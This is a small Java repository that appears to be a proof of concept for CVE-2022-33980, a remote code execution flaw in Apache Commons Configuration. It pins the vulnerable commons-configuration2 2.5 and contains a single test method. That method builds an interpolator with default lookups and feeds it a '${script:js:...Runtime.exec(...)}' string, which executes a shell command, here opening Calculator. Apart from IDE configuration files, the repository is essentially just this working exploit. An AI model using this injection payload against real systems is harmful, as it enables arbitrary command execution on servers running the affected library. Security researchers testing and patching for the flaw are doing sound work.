├── .idea
    ├── .gitignore
    ├── compiler.xml
    ├── jarRepositories.xml
    ├── misc.xml
    └── vcs.xml
├── README.md
├── img.png
├── pom.xml
└── src
    └── main
        └── java
            └── com
                └── txf
                    └── main.java


/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Editor-based HTTP Client requests
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 | 


--------------------------------------------------------------------------------
/.idea/compiler.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="CompilerConfiguration">
 4 |     <annotationProcessing>
 5 |       <profile name="Maven default annotation processors profile" enabled="true">
 6 |         <sourceOutputDir name="target/generated-sources/annotations" />
 7 |         <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
 8 |         <outputRelativeToContentRoot value="true" />
 9 |         <module name="CVE-2022-33980" />
10 |       </profile>
11 |     </annotationProcessing>
12 |   </component>
13 | </project>


--------------------------------------------------------------------------------
/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="RemoteRepositoriesConfiguration">
 4 |     <remote-repository>
 5 |       <option name="id" value="central" />
 6 |       <option name="name" value="Maven Central repository" />
 7 |       <option name="url" value="https://repo1.maven.org/maven2" />
 8 |     </remote-repository>
 9 |     <remote-repository>
10 |       <option name="id" value="jboss.community" />
11 |       <option name="name" value="JBoss Community repository" />
12 |       <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
13 |     </remote-repository>
14 |     <remote-repository>
15 |       <option name="id" value="central" />
16 |       <option name="name" value="Central Repository" />
17 |       <option name="url" value="https://maven.aliyun.com/repository/public" />
18 |     </remote-repository>
19 |   </component>
20 | </project>


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ExternalStorageConfigurationManager" enabled="true" />
 4 |   <component name="MavenProjectsManager">
 5 |     <option name="originalFiles">
 6 |       <list>
 7 |         <option value="$PROJECT_DIR$/pom.xml" />
 8 |       </list>
 9 |     </option>
10 |   </component>
11 |   <component name="ProjectRootManager" version="2" languageLevel="JDK_11" default="true" project-jdk-name="zulu-11" project-jdk-type="JavaSDK">
12 |     <output url="file://$PROJECT_DIR$/out" />
13 |   </component>
14 | </project>


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="$PROJECT_DIR$" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-33980-Apache-Commons-Configuration-RCE
2 | 
3 | ![img.png](img.png)


--------------------------------------------------------------------------------
/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE/135267a030fe066ced5abf2ad28946b447d89c53/img.png


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project xmlns="http://maven.apache.org/POM/4.0.0"
 3 |          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |     <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |     <groupId>org.example</groupId>
 8 |     <artifactId>CVE-2022-33980</artifactId>
 9 |     <version>1.0-SNAPSHOT</version>
10 | 
11 |     <dependencies>
12 |         <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-configuration2 -->
13 |         <dependency>
14 |             <groupId>org.apache.commons</groupId>
15 |             <artifactId>commons-configuration2</artifactId>
16 |             <version>2.5</version>
17 |         </dependency>
18 | 
19 |         <dependency>
20 |             <groupId>junit</groupId>
21 |             <artifactId>junit</artifactId>
22 |             <version>4.13.2</version>
23 |             <scope>compile</scope>
24 |         </dependency>
25 | 
26 | 
27 |     </dependencies>
28 | 
29 |     <properties>
30 |         <maven.compiler.source>8</maven.compiler.source>
31 |         <maven.compiler.target>8</maven.compiler.target>
32 |     </properties>
33 | 
34 | </project>


--------------------------------------------------------------------------------
/src/main/java/com/txf/main.java:
--------------------------------------------------------------------------------
 1 | package com.txf;
 2 | 
 3 | import org.apache.commons.configuration2.interpol.ConfigurationInterpolator;
 4 | import org.apache.commons.configuration2.interpol.InterpolatorSpecification;
 5 | import org.junit.Test;
 6 | 
 7 | 
 8 | 
 9 | public class main {
10 | 
11 |     @Test
12 |     public void testProperties() throws Exception{
13 |         InterpolatorSpecification spec = new InterpolatorSpecification.Builder()
14 |                 .withPrefixLookups(ConfigurationInterpolator.getDefaultPrefixLookups())
15 |                 .withDefaultLookups(ConfigurationInterpolator.getDefaultPrefixLookups().values())
16 |                 .create();
17 | 
18 |         ConfigurationInterpolator interpolator = ConfigurationInterpolator.fromSpecification(spec);
19 |         System.out.printf("POC: %s",interpolator.interpolate("${script:js:java.lang.Runtime.getRuntime().exec(\"open /system/Applications/Calculator.app\")}"));
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------